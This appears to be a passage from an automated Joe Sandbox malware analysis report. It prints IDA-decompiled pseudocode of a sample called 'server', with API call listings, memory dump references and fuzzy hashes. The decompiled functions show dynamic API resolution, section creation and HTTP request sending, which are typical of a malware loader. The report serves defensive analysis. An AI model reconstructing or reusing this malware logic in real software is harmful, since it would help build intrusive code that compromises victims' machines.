              						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
              						 *(_t56 + 0x10) = _t33;
              						if(_t33 == 0) {
              							goto L8;
              						} else {
              							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
              							 *(_t56 + 0x14) = _t36;
              							if(_t36 == 0) {
              								goto L8;
              							} else {
              								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
              								 *(_t56 + 0x18) = _t39;
              								if(_t39 == 0) {
              									goto L8;
              								} else {
              									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
              									 *(_t56 + 0x1c) = _t42;
              									if(_t42 == 0) {
              										goto L8;
              									} else {
              										 *((intOrPtr*)(_t56 + 8)) = _a8;
              										 *((intOrPtr*)(_t56 + 4)) = _a4;
              										_t46 = E0040110B(_t56, _a12); // executed
              										_v8 = _t46;
              										if(_t46 != 0) {
              											goto L8;
              										} else {
              											 *_a16 = _t56;
              										}
              									}
              								}
              							}
              						}
              					}
              				}
              				return _v8;
              			}












              0x00401210
              0x00401214
              0x004012d5
              0x0040121a
              0x00401232
              0x00401241
              0x00401248
              0x0040124a
              0x0040124f
              0x004012cd
              0x004012ce
              0x00401251
              0x0040125e
              0x00401260
              0x00401265
              0x00000000
              0x00401267
              0x00401274
              0x00401276
              0x0040127b
              0x00000000
              0x0040127d
              0x0040128a
              0x0040128c
              0x00401291
              0x00000000
              0x00401293
              0x004012a0
              0x004012a2
              0x004012a7
              0x00000000
              0x004012a9
              0x004012af
              0x004012b5
              0x004012ba
              0x004012bf
              0x004012c4
              0x00000000
              0x004012c6
              0x004012c9
              0x004012c9
              0x004012c4
              0x004012a7
              0x00401291
              0x0040127b
              0x00401265
              0x0040124f
              0x004012e3

              APIs
                • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
              • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
              • GetProcAddress.KERNEL32(00000000,?), ref: 00401248
              • GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
              • GetProcAddress.KERNEL32(00000000,?), ref: 00401274
              • GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
              • GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
                • Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 00401168
                • Part of subcall function 0040110B: memset.NTDLL ref: 0040118A
              Memory Dump Source
              • Source File: 00000000.00000002.568497701.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.568497701.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_server.jbxd
              Similarity
              • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
              • String ID:
              • API String ID: 3012371009-0
              • Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
              • Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
              • Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
              • Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 367 2ce51d8-2ce51e7 368 2ce51fb-2ce51ff call 2ce7b83 367->368 369 2ce51e9-2ce51f9 call 2ce2058 367->369 373 2ce5204-2ce5206 368->373 369->368 374 2ce524a GetLastError 369->374 375 2ce5208-2ce522d ResetEvent * 2 HttpSendRequestA 373->375 376 2ce5245-2ce5248 373->376 377 2ce524c-2ce524e 374->377 378 2ce522f-2ce5236 GetLastError 375->378 379 2ce523a-2ce523d SetEvent 375->379 376->374 376->377 378->376 380 2ce5238 378->380 381 2ce5243 379->381 380->381 381->376
              C-Code - Quality: 100%
              			E02CE51D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
              				void* __esi;
              				long _t10;
              				void* _t18;
              				void* _t22;
              
              				_t9 = __eax;
              				_t22 = __eax;
              				if(_a4 != 0 && E02CE2058(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
              					L9:
              					return GetLastError();
              				}
              				_t10 = E02CE7B83(_t9, _t18, _t22, _a8); // executed
              				if(_t10 == 0) {
              					ResetEvent( *(_t22 + 0x1c));
              					ResetEvent( *(_t22 + 0x20));
              					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
              						SetEvent( *(_t22 + 0x1c));
              						goto L7;
              					} else {
              						_t10 = GetLastError();
              						if(_t10 == 0x3e5) {
              							L7:
              							_t10 = 0;
              						}
              					}
              				}
              				if(_t10 == 0xffffffff) {
              					goto L9;
              				}
              				return _t10;
              			}







              0x02ce51d8
              0x02ce51e5
              0x02ce51e7
              0x02ce524a
              0x00000000
              0x02ce524a
              0x02ce51ff
              0x02ce5206
              0x02ce5212
              0x02ce5217
              0x02ce522d
              0x02ce523d
              0x00000000
              0x02ce522f
              0x02ce522f
              0x02ce5236
              0x02ce5243
              0x02ce5243
              0x02ce5243
              0x02ce5236
              0x02ce522d
              0x02ce5248
              0x00000000
              0x00000000
              0x02ce524e

              APIs
              • ResetEvent.KERNEL32(?,00000008,?,?,00000102,02CE21E7,?,?,747581D0,00000000), ref: 02CE5212
              • ResetEvent.KERNEL32(?), ref: 02CE5217
              • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 02CE5224
              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02CE3F34,00000000,?,?), ref: 02CE522F
              • GetLastError.KERNEL32(?,?,00000102,02CE21E7,?,?,747581D0,00000000), ref: 02CE524A
                • Part of subcall function 02CE2058: lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,02CE51F7,?,?,?,?,00000102,02CE21E7,?,?,747581D0), ref: 02CE2064
                • Part of subcall function 02CE2058: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02CE51F7,?,?,?,?,00000102,02CE21E7,?), ref: 02CE20C2
                • Part of subcall function 02CE2058: lstrcpy.KERNEL32(00000000,00000000), ref: 02CE20D2
              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02CE3F34,00000000,?), ref: 02CE523D
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
              • String ID:
              • API String ID: 3739416942-0
              • Opcode ID: 94370196737e4240d5eed3cfce35d3aed65e6e05e14dacf8f2a8a3415e99895e
              • Instruction ID: 8305e46fca95a0399540e8d0c6233e30484d8fbfbf3cdf3e1d93ab1a4c90bcac
              • Opcode Fuzzy Hash: 94370196737e4240d5eed3cfce35d3aed65e6e05e14dacf8f2a8a3415e99895e
              • Instruction Fuzzy Hash: 6A016D71140241AEDF306B71DC44F5BBBA9BF883A8F900B25F593D10E0D721E514DA61
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 50%
              			E02CE5364(void** __esi) {
              				intOrPtr _v0;
              				intOrPtr _t4;
              				intOrPtr _t6;
              				void* _t8;
              				void* _t9;
              				intOrPtr _t10;
              				void* _t11;
              				void** _t13;
              
              				_t13 = __esi;
              				_t4 =  *0x2cea3cc; // 0x5259600
              				__imp__(_t4 + 0x40);
              				while(1) {
              					_t6 =  *0x2cea3cc; // 0x5259600
              					_t1 = _t6 + 0x58; // 0x0
              					if( *_t1 == 0) {
              						break;
              					}
              					Sleep(0xa);
              				}
              				_t8 =  *_t13;
              				if(_t8 != 0 && _t8 != 0x2cea030) {
              					HeapFree( *0x2cea2d8, 0, _t8);
              				}
              				_t9 = E02CE12C6(_v0, _t13); // executed
              				_t13[1] = _t9;
              				_t10 =  *0x2cea3cc; // 0x5259600
              				_t11 = _t10 + 0x40;
              				__imp__(_t11);
              				return _t11;
              			}











              0x02ce5364
              0x02ce5364
              0x02ce536d
              0x02ce537d
              0x02ce537d
              0x02ce5382
              0x02ce5387
              0x00000000
              0x00000000
              0x02ce5377
              0x02ce5377
              0x02ce5389
              0x02ce538d
              0x02ce539f
              0x02ce539f
              0x02ce53aa
              0x02ce53af
              0x02ce53b2
              0x02ce53b7
              0x02ce53bb
              0x02ce53c1

              APIs
              • RtlEnterCriticalSection.NTDLL(052595C0), ref: 02CE536D
              • Sleep.KERNEL32(0000000A), ref: 02CE5377
              • HeapFree.KERNEL32(00000000,00000000), ref: 02CE539F
              • RtlLeaveCriticalSection.NTDLL(052595C0), ref: 02CE53BB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
              • String ID: Uqt
              • API String ID: 58946197-2320327147
              • Opcode ID: bd12657c23fc6a93a288143d6bda42e4eec51e5b828a99a1f22bea51a05f3e52
              • Instruction ID: ebb76bc5f61a846b4fff3f0d8555a24ab4fe827dd307563e93316814639b81f3
              • Opcode Fuzzy Hash: bd12657c23fc6a93a288143d6bda42e4eec51e5b828a99a1f22bea51a05f3e52
              • Instruction Fuzzy Hash: 26F01C71A80241EFEF209F69DC48F163BF4AF48384B488E04F50BDA261D770D860DB65
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 59%
              			E02CE2523(signed int __edx) {
              				signed int _v8;
              				long _v12;
              				CHAR* _v16;
              				long _v20;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* _t21;
              				CHAR* _t22;
              				CHAR* _t25;
              				intOrPtr _t26;
              				void* _t27;
              				void* _t31;
              				intOrPtr _t32;
              				void* _t33;
              				CHAR* _t37;
              				CHAR* _t43;
              				CHAR* _t44;
              				CHAR* _t45;
              				void* _t50;
              				void* _t52;
              				signed char _t57;
              				intOrPtr _t59;
              				signed int _t60;
              				void* _t64;
              				CHAR* _t68;
              				CHAR* _t69;
              				char* _t70;
              				void* _t71;
              
              				_t62 = __edx;
              				_v20 = 0;
              				_v8 = 0;
              				_v12 = 0;
              				_t21 = E02CE4520();
              				if(_t21 != 0) {
              					_t60 =  *0x2cea2fc; // 0x2000000a
              					_t56 = (_t60 & 0xf0000000) + _t21;
              					 *0x2cea2fc = (_t60 & 0xf0000000) + _t21;
              				}
              				_t22 =  *0x2cea178(0, 2); // executed
              				_v16 = _t22;
              				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
              					_t25 = E02CE3037( &_v8,  &_v20); // executed
              					_t55 = _t25;
              					_t26 =  *0x2cea348; // 0x256d5a8
              					if( *0x2cea2fc > 5) {
              						_t8 = _t26 + 0x2ceb51d; // 0x4d283a53
              						_t27 = _t8;
              					} else {
              						_t7 = _t26 + 0x2ceb9db; // 0x44283a44
              						_t27 = _t7;
              					}
              					E02CE4332(_t27, _t27);
              					_t31 = E02CE415A(_t62,  &_v20,  &_v12); // executed
              					if(_t31 == 0) {
              						CloseHandle(_v20);
              					}
              					_t64 = 5;
              					if(_t55 != _t64) {
              						_t32 = E02CE27A0();
              						 *0x2cea310 =  *0x2cea310 ^ 0x81bbe65d;
              						 *0x2cea36c = _t32;
              						_t33 = E02CE33DC(0x60);
              						 *0x2cea3cc = _t33;
              						__eflags = _t33;
              						if(_t33 == 0) {
              							_push(8);
              							_pop(0);
              						} else {
              							memset(_t33, 0, 0x60);
              							_t50 =  *0x2cea3cc; // 0x5259600
              							_t71 = _t71 + 0xc;
              							__imp__(_t50 + 0x40);
              							_t52 =  *0x2cea3cc; // 0x5259600
              							 *_t52 = 0x2ceb142;
              						}
              						_t55 = 0;
              						__eflags = 0;
              						if(0 == 0) {
              							_t37 = RtlAllocateHeap( *0x2cea2d8, 0, 0x43);
              							 *0x2cea368 = _t37;
              							__eflags = _t37;
              							if(_t37 == 0) {
              								_push(8);
              								_pop(0);
              							} else {
              								_t57 =  *0x2cea2fc; // 0x2000000a
              								_t62 = _t57 & 0x000000ff;
              								_t59 =  *0x2cea348; // 0x256d5a8
              								_t13 = _t59 + 0x2ceb74a; // 0x697a6f4d
              								_t56 = _t13;
              								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x2ce927b);
              							}
              							_t55 = 0;
              							__eflags = 0;
              							if(0 == 0) {
              								asm("sbb eax, eax");
              								E02CE3BD3( ~_v8 &  *0x2cea310, 0x2cea00c); // executed
              								_t43 = E02CE1D8A(0, _t56, _t62, _t64, 0x2cea00c); // executed
              								_t55 = _t43;
              								__eflags = _t55;
              								if(_t55 != 0) {
              									goto L30;
              								}
              								_t44 = E02CE6EA3(_t62); // executed
              								__eflags = _t44;
              								if(_t44 != 0) {
              									__eflags = _v8;
              									_t68 = _v12;
              									if(_v8 != 0) {
              										L29:
              										_t45 = E02CE6815(_t62, _t68, _v8); // executed
              										_t55 = _t45;
              										goto L30;
              									}
              									__eflags = _t68;
              									if(__eflags == 0) {
              										goto L30;
              									}
              									_t55 = E02CE5C31(__eflags,  &(_t68[4]));
              									__eflags = _t55;
              									if(_t55 == 0) {
              										goto L30;
              									}
              									goto L29;
              								}
              								_t55 = 8;
              							}
              						}
              					} else {
              						_t69 = _v12;
              						if(_t69 == 0) {
              							L30:
              							if(_v16 == 0 || _v16 == 1) {
              								 *0x2cea17c();
              							}
              							goto L34;
              						}
              						_t70 =  &(_t69[4]);
              						do {
              						} while (E02CE23C4(_t64, _t70, 0, 1) == 0x4c7);
              					}
              					goto L30;
              				} else {
              					_t55 = _t22;
              					L34:
              					return _t55;
              				}
              			}
































              0x02ce2523
              0x02ce252d
              0x02ce2530
              0x02ce2533
              0x02ce2536
              0x02ce253d
              0x02ce253f
              0x02ce254b
              0x02ce254d
              0x02ce254d
              0x02ce2556
              0x02ce255c
              0x02ce2561
              0x02ce257b
              0x02ce2587
              0x02ce2589
              0x02ce258e
              0x02ce2598
              0x02ce2598
              0x02ce2590
              0x02ce2590
              0x02ce2590
              0x02ce2590
              0x02ce259f
              0x02ce25ac
              0x02ce25b3
              0x02ce25b8
              0x02ce25b8
              0x02ce25c1
              0x02ce25c4
              0x02ce25ea
              0x02ce25ef
              0x02ce25fb
              0x02ce2600
              0x02ce2605
              0x02ce260a
              0x02ce260c
              0x02ce2638
              0x02ce263a
              0x02ce260e
              0x02ce2612
              0x02ce2617
              0x02ce261c
              0x02ce2623
              0x02ce2629
              0x02ce262e
              0x02ce2634
              0x02ce263b
              0x02ce263d
              0x02ce263f
              0x02ce264e
              0x02ce2654
              0x02ce2659
              0x02ce265b
              0x02ce268b
              0x02ce268d
              0x02ce265d
              0x02ce265d
              0x02ce2663
              0x02ce2670
              0x02ce2676
              0x02ce2676
              0x02ce267e
              0x02ce2687
              0x02ce268e
              0x02ce2690
              0x02ce2692
              0x02ce2699
              0x02ce26a6
              0x02ce26ab
              0x02ce26b0
              0x02ce26b2
              0x02ce26b4
              0x00000000
              0x00000000
              0x02ce26b6
              0x02ce26bb
              0x02ce26bd
              0x02ce26c4
              0x02ce26c8
              0x02ce26cb
              0x02ce26e0
              0x02ce26e4
              0x02ce26e9
              0x00000000
              0x02ce26e9
              0x02ce26cd
              0x02ce26cf
              0x00000000
              0x00000000
              0x02ce26da
              0x02ce26dc
              0x02ce26de
              0x00000000
              0x00000000
              0x00000000
              0x02ce26de
              0x02ce26c1
              0x02ce26c1
              0x02ce2692
              0x02ce25c6
              0x02ce25c6
              0x02ce25cb
              0x02ce26eb
              0x02ce26f0
              0x02ce26f8
              0x02ce26f8
              0x00000000
              0x02ce26f0
              0x02ce25d1
              0x02ce25d4
              0x02ce25de
              0x02ce25e5
              0x00000000
              0x02ce2700
              0x02ce2700
              0x02ce2703
              0x02ce2707
              0x02ce2707

              APIs
                • Part of subcall function 02CE4520: GetModuleHandleA.KERNEL32(4C44544E,00000000,02CE253B,00000001), ref: 02CE452F
              • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02CE25B8
                • Part of subcall function 02CE27A0: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 02CE27C4
                • Part of subcall function 02CE27A0: wsprintfA.USER32 ref: 02CE2828
                • Part of subcall function 02CE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02CE62F6), ref: 02CE33E8
              • memset.NTDLL ref: 02CE2612
              • RtlInitializeCriticalSection.NTDLL(052595C0), ref: 02CE2623
                • Part of subcall function 02CE5C31: memset.NTDLL ref: 02CE5C4B
                • Part of subcall function 02CE5C31: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02CE5C91
                • Part of subcall function 02CE5C31: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 02CE5C9C
              • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02CE264E
              • wsprintfA.USER32 ref: 02CE267E
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
              • String ID:
              • API String ID: 1825273115-0
              • Opcode ID: 9429c9618fb175da2003618eae5af2d8b1ad657132e02ad1b998231edff0539c
              • Instruction ID: ac04ab3c3c46aa952da4781ba20f50105c0c96b6bc18a42f21563e69160d48fb
              • Opcode Fuzzy Hash: 9429c9618fb175da2003618eae5af2d8b1ad657132e02ad1b998231edff0539c
              • Instruction Fuzzy Hash: 9A51D1B1E81214EFDF21EBA0DD95B6E77ACBB48704F140A16E90BEB140D7709B508F92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 22%
              			E02CE7040(signed int __eax, signed int _a4, signed int _a8) {
              				signed int _v8;
              				signed int _v12;
              				intOrPtr _v16;
              				signed int _v20;
              				intOrPtr _t81;
              				char _t83;
              				signed int _t90;
              				signed int _t97;
              				signed int _t99;
              				char _t101;
              				unsigned int _t102;
              				intOrPtr _t103;
              				char* _t107;
              				signed int _t110;
              				signed int _t113;
              				signed int _t118;
              				signed int _t122;
              				intOrPtr _t124;
              
              				_t102 = _a8;
              				_t118 = 0;
              				_v20 = __eax;
              				_t122 = (_t102 >> 2) + 1;
              				_v8 = 0;
              				_a8 = 0;
              				_t81 = E02CE33DC(_t122 << 2);
              				_v16 = _t81;
              				if(_t81 == 0) {
              					_push(8);
              					_pop(0);
              					L37:
              					return 0;
              				}
              				_t107 = _a4;
              				_a4 = _t102;
              				_t113 = 0;
              				while(1) {
              					_t83 =  *_t107;
              					if(_t83 == 0) {
              						break;
              					}
              					if(_t83 == 0xd || _t83 == 0xa) {
              						if(_t118 != 0) {
              							if(_t118 > _v8) {
              								_v8 = _t118;
              							}
              							_a8 = _a8 + 1;
              							_t118 = 0;
              						}
              						 *_t107 = 0;
              						goto L16;
              					} else {
              						if(_t118 != 0) {
              							L10:
              							_t118 = _t118 + 1;
              							L16:
              							_t107 = _t107 + 1;
              							_t15 =  &_a4;
              							 *_t15 = _a4 - 1;
              							if( *_t15 != 0) {
              								continue;
              							}
              							break;
              						}
              						if(_t113 == _t122) {
              							L21:
              							if(_a8 <= 0x20) {
              								_push(0xb);
              								L34:
              								_pop(0);
              								L35:
              								E02CE61DA(_v16);
              								goto L37;
              							}
              							_t24 = _v8 + 5; // 0xcdd8d2f8
              							_t103 = E02CE33DC((_v8 + _t24) * _a8 + 4);
              							if(_t103 == 0) {
              								_push(8);
              								goto L34;
              							}
              							_t90 = _a8;
              							_a4 = _a4 & 0x00000000;
              							_v8 = _v8 & 0x00000000;
              							_t124 = _t103 + _t90 * 4;
              							if(_t90 <= 0) {
              								L31:
              								 *0x2cea318 = _t103;
              								goto L35;
              							}
              							do {
              								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
              								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
              								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
              								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
              								_v12 = _v12 & 0x00000000;
              								if(_a4 <= 0) {
              									goto L30;
              								} else {
              									goto L26;
              								}
              								while(1) {
              									L26:
              									_t99 = _v12;
              									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
              									if(_t99 == 0) {
              										break;
              									}
              									_v12 = _v12 + 1;
              									if(_v12 < _a4) {
              										continue;
              									}
              									goto L30;
              								}
              								_v8 = _v8 - 1;
              								L30:
              								_t97 = _a4;
              								_a4 = _a4 + 1;
              								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
              								__imp__(_t124);
              								_v8 = _v8 + 1;
              								_t124 = _t124 + _t97 + 1;
              							} while (_v8 < _a8);
              							goto L31;
              						}
              						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
              						_t101 = _t83;
              						if(_t83 - 0x61 <= 0x19) {
              							_t101 = _t101 - 0x20;
              						}
              						 *_t107 = _t101;
              						_t113 = _t113 + 1;
              						goto L10;
              					}
              				}
              				if(_t118 != 0) {
              					if(_t118 > _v8) {
              						_v8 = _t118;
              					}
              					_a8 = _a8 + 1;
              				}
              				goto L21;
              			}





















              0x02ce7047
              0x02ce704e
              0x02ce7053
              0x02ce7056
              0x02ce705d
              0x02ce7060
              0x02ce7063
              0x02ce7068
              0x02ce706d
              0x02ce71c1
              0x02ce71c3
              0x02ce71c5
              0x02ce71ca
              0x02ce71ca
              0x02ce7073
              0x02ce7076
              0x02ce7079
              0x02ce707b
              0x02ce707b
              0x02ce707f
              0x00000000
              0x00000000
              0x02ce7083
              0x02ce70af
              0x02ce70b4
              0x02ce70b6
              0x02ce70b6
              0x02ce70b9
              0x02ce70bc
              0x02ce70bc
              0x02ce70be
              0x00000000
              0x02ce7089
              0x02ce708b
              0x02ce70aa
              0x02ce70aa
              0x02ce70c1
              0x02ce70c1
              0x02ce70c2
              0x02ce70c2
              0x02ce70c5
              0x00000000
              0x00000000
              0x00000000
              0x02ce70c5
              0x02ce708f
              0x02ce70d6
              0x02ce70da
              0x02ce71b4
              0x02ce71b6
              0x02ce71b6
              0x02ce71b7
              0x02ce71ba
              0x00000000
              0x02ce71ba
              0x02ce70e3
              0x02ce70f4
              0x02ce70f8
              0x02ce71b0
              0x00000000
              0x02ce71b0
              0x02ce70fe
              0x02ce7101
              0x02ce7105
              0x02ce7109
              0x02ce710e
              0x02ce71a6
              0x02ce71a6
              0x00000000
              0x02ce71ac
              0x02ce7119
              0x02ce7122
              0x02ce7136
              0x02ce713d
              0x02ce7152
              0x02ce7158
              0x02ce7160
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02ce7162
              0x02ce7162
              0x02ce7162
              0x02ce7169
              0x02ce7171
              0x00000000
              0x00000000
              0x02ce7173
              0x02ce717c
              0x00000000
              0x00000000
              0x00000000
              0x02ce717e
              0x02ce7180
              0x02ce7183
              0x02ce7183
              0x02ce7186
              0x02ce718a
              0x02ce718d
              0x02ce7193
              0x02ce7196
              0x02ce719d
              0x00000000
              0x02ce7119
              0x02ce7094
              0x02ce709c
              0x02ce70a2
              0x02ce70a4
              0x02ce70a4
              0x02ce70a7
              0x02ce70a9
              0x00000000
              0x02ce70a9
              0x02ce7083
              0x02ce70c9
              0x02ce70ce
              0x02ce70d0
              0x02ce70d0
              0x02ce70d3
              0x02ce70d3
              0x00000000

              APIs
                • Part of subcall function 02CE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02CE62F6), ref: 02CE33E8
              • lstrcpy.KERNEL32(43175AC4,00000020), ref: 02CE713D
              • lstrcat.KERNEL32(43175AC4,00000020), ref: 02CE7152
              • lstrcmp.KERNEL32(00000000,43175AC4), ref: 02CE7169
              • lstrlen.KERNEL32(43175AC4), ref: 02CE718D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
              • String ID:
              • API String ID: 3214092121-3916222277
              • Opcode ID: b69c31bdf45a4a749d9690f33ac63a9eef62b9db1c96a5e993b89b400d16bbee
              • Instruction ID: 7d14878a5a24163b1a76be6039d81e633d2a5afc5a7330f7aa71c984eb30ca9b
              • Opcode Fuzzy Hash: b69c31bdf45a4a749d9690f33ac63a9eef62b9db1c96a5e993b89b400d16bbee
              • Instruction Fuzzy Hash: 8251A071A00218EFDF21CF99C984BADFBB6FF85354F14805AE81A9B215C770AB55CB90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			_entry_() {
              				void* _t1;
              				int _t4;
              				int _t6;
              
              				_t6 = 0;
              				_t1 = HeapCreate(0, 0x400000, 0); // executed
              				 *0x404160 = _t1;
              				if(_t1 != 0) {
              					 *0x404170 = GetModuleHandleA(0);
              					GetCommandLineW(); // executed
              					_t4 = E004019F1(); // executed
              					_t6 = _t4;
              					HeapDestroy( *0x404160);
              				}
              				ExitProcess(_t6);
              			}






              0x00401de2
              0x00401deb
              0x00401df1
              0x00401df8
              0x00401e01
              0x00401e06
              0x00401e0c
              0x00401e17
              0x00401e19
              0x00401e19
              0x00401e20

              APIs
              • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401DEB
              • GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
              • GetCommandLineW.KERNEL32 ref: 00401E06
                • Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
                • Part of subcall function 004019F1: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
                • Part of subcall function 004019F1: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
                • Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
                • Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
                • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
                • Part of subcall function 004019F1: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
              • HeapDestroy.KERNEL32 ref: 00401E19
              • ExitProcess.KERNEL32 ref: 00401E20
              Memory Dump Source
              • Source File: 00000000.00000002.568497701.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.568497701.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_server.jbxd
              Similarity
              • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
              • String ID:
              • API String ID: 1863574965-0
              • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
